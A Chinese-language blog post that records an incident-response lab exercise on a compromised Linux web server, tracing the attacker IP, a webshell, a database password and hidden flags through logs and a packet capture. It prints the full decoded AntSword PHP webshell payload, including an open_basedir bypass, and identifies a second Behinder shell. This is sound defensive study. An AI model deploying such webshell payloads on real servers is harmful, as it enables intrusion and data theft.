知攻善防应急靶场-Linux(2)

前言:

堕落了三个月,现在因为被找实习而困扰,着实自己能力不足,从今天开始 每天沉淀一点点 ,准备秋招 加油

注意:

本文章参考qax的网络安全应急响应和知攻善防实验室靶场,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误

靶场前言:

看监控的时候发现webshell告警,领导让你上机检查你可以救救安服仔吗!!

靶场要求:

(1)提交攻击者IP

(2)提交攻击者修改的管理员密码(明文)

(3)提交第一次Webshell的连接URL

(4)提交Webshell连接密码

(5)提交数据包的flag1

(6)提交攻击者使用的后续上传的木马文件名称

(7)提交攻击者隐藏的flag2

(8)提交攻击者隐藏的flag3

过程:

查看本机网卡

查询管理员最近登录情况命令

java 复制代码
 grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'

根据对比本机IP可以得知该 192.168.20.1即为攻击者的IP,解决(1) 问题,然后照常检查系统有没有运行什么可疑的程序

发现mysql运行了, 这样的话我们就可以去找管理员密码了,目标就很明确了,先去获取数据库密码,然后在www目录的access.log发现路由phpmyadmin

那估计网站搭建数据库是使用了phpmyadmin ,那我们直接去找配置文件config.inc.php就可以

最终在/www/wwwroot/127.0.0.1/lib目录下找到了

得到数据库账号密码

java 复制代码
kaoshi: 5Sx8mK5ieyLPb84m

然后登入数据库 查到id为1 的为管理员

寻找id为1 得到密码

得到密码为加密的形式

java 复制代码
f6f6eb5ace977d7e114377cc7098b7e3

解码得到:管理员密码(问题2):Network@2020

我们在root目录下发现了一个 1.pcapng文件 那就的用wireshark进行分析了,直接过滤 攻击者ip ip.addr == 192.168.20.1 然后就看到flag1路径 打开得到flag1(问题5)

java 复制代码
flag1{Network@_2020_Hack}

然后其他的数据流全是index.php?user-app-registerversion2.php ,追踪得到

url解码得到PHP代码

php 复制代码
Network2020=@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
	$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
	$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
	@array_push($oparr,$ocwd,sys_get_temp_dir());
	foreach($oparr as $item) {
		if(!@is_writable($item)) {
			continue;
		}
		;
		$tmdir=$item."/.fd491f470fb7";
		@mkdir($tmdir);
		if(!@file_exists($tmdir)) {
			continue;
		}
		$tmdir=realpath($tmdir);
		@chdir($tmdir);
		@ini_set("open_basedir", "..");
		$cntarr=@preg_split("/\\\\|\//",$tmdir);
		for ($i=0;$i<sizeof($cntarr);$i++) {
			@chdir("..");
		}
		;
		@ini_set("open_basedir","/");
		@rmdir($tmdir);
		break;
	}
	;
}
;
;
function asenc($out) {
	return $out;
}
;
function asoutput() {
	$output=ob_get_contents();
	ob_end_clean();
	echo "4a0c"."dc70";
	echo @asenc($output);
	echo "db6"."da5";
}
ob_start();
try {
	$D=dirname($_SERVER["SCRIPT_FILENAME"]);
	if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
	$R="{$D}	";
	if(substr($D,0,1)!="/") {
		foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";
	} else {
		$R.="/";
	}
	$R.="	";
	$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
	$s=($u)?$u["name"]:@get_current_user();
	$R.=php_uname();
	$R.="	{$s}";
	echo $R;
	;
}
catch(Exception $e) {
	echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();
  1. 代码混淆:该代码使用了一些混淆技术,如函数和变量名的简写、base64 编码和字符串拼接,以增加代码的复杂性和难以理解性。

  2. 文件和目录操作:代码尝试获取脚本所在目录的路径,并在一系列目录中创建临时目录。它还尝试更改 PHP 的 open_basedir 设置,以限制脚本的访问权限。这些操作可能会导致安全风险,特别是对于共享主机环境。

  3. 输出处理:代码使用 ob_start()ob_get_contents() 函数来捕获输出内容,并通过 asenc() 函数进行处理。然后,它将处理后的输出进行拼接和输出。这种输出处理方式是不寻常的,目的和处理过程不清楚。

  4. 系统信息泄露:代码通过调用 php_uname() 函数获取服务器的一些系统信息,如路径和当前用户。这种信息泄露可能会暴露系统的敏感信息。

  5. 潜在的异常处理问题:代码使用了一个异常处理结构,但在异常发生时只是简单地输出了错误消息,并没有实际处理或记录异常。这可能导致问题的隐藏和难以调试。

那就得知了提交第一次Webshell的连接URL为(问题3)

php 复制代码
index.php?user-app-register

根据 Network2020=@ini_set("display_errors", "0"); 就可以知道这段代码基本是所有WebShell客户端链接PHP类WebShell都有的一种代码,但是有的客户端会将这段编码或者加密,而蚁剑是明文,所以较好发现。

所以提交Webshell连接密码为(问题4)

php 复制代码
Network2020

现在我们查看第二个数据包发现最后一行为可执行字符串

php 复制代码
x0b6b31b98f31d=TtL3d3dy93d3dyb290LzEyNy4wLjAuMS8=

因为蚁剑会将参数进行base64编码,然后在最前面随机添加两个字母,所以想知道这个参数是什么应该对L3d3dy93d3dyb290LzEyNy4wLjAuMS8=进行base64解码,得到参数

好熟悉 之前咱们的数据库的数据也在这个目录下,那就可以得知攻击在/www/wwwroot/127.0.0.1/目录下创建了flag1 文件并写入flag,然后写入一个新的木马,再改名为version2.php,那么后续访问version2.php的流量包应该就是后续上传的木马文件了 那我们追踪version2.php

一眼冰蝎特征

参考https://www.freebuf.com/articles/network/345803.html

那就可以说明 version2.php就是攻击者后续上传的木马进行getshell了(问题6)

拿到shell了 我们就看看攻击者干了什么 输入 history

关闭防火墙

删除了flag1 和 version2.php 这就和前面的分析对上了

在隐藏目录.api下修改了2个php文件,且得到了flag3(问题8)

php 复制代码
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

那我们访问修改的php文件,在alinotify.php文件下得到flag2(问题7)

flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}

至此,所有任务全部完成

总结:

以下总结为自己思考 ,可能存在某方面不全或者错误,水平有限,还请见谅

1.该攻击者的IP为192.168.20.1

2.攻击方式应该是通过/index.php?user-app-register上传了一个webshell,然后使用蚁剑管理webshell之后再次上传version2.php进行提权.

3.攻击者修改了phpmyadmin数据库的管理员密码

3.攻击者拿到权限之后 关闭了防火墙服务,并且删除了提权文件version2.php和flag1,并且修改了alinotify.php文件内容

4.并没有发现攻击者留下后门

清除加固:

1.封禁攻击者IP

2.经过测验,发现攻击者可通过22端口进行ssh连接,应当更改ssh默认端口或者关闭ssh连接

3.修复更改后的文件且还原数据库里面管理员的密码

4.对上传的文件 或者字符串进行过滤处理

5.对传入的用户数据进行预编译处理+手动过滤 防止sql注入泄露更改管理员密码

6.重启防火墙服务

7.关闭某些可以提权的shell函数

相关推荐
想学习java初学者10 分钟前
Docker compose部署elasticsearch(单机版)
运维·docker·容器
人类群星闪耀时37 分钟前
未来运维的发展趋势:运维领域的新技术与趋势
运维
落非42 分钟前
NFS存储基础操作
运维
Vanish_ran1 小时前
gitlab与jenkins
运维·gitlab·jenkins
朱容君1 小时前
Linux系统编程多线程之读写锁讲解
linux·开发语言
大风吹PP凉1 小时前
38配置管理工具(如Ansible、Puppet、Chef)
linux·运维·服务器·ansible·puppet
康熙38bdc2 小时前
Linux 进程间通信——共享内存
linux·运维·服务器
jwybobo20072 小时前
redis7.x源码分析:(3) dict字典
linux·redis
scoone2 小时前
ssh登陆服务器后支持Tab键命令补全
linux·shell
微刻时光2 小时前
Docker部署Nginx
运维·nginx·docker·容器·经验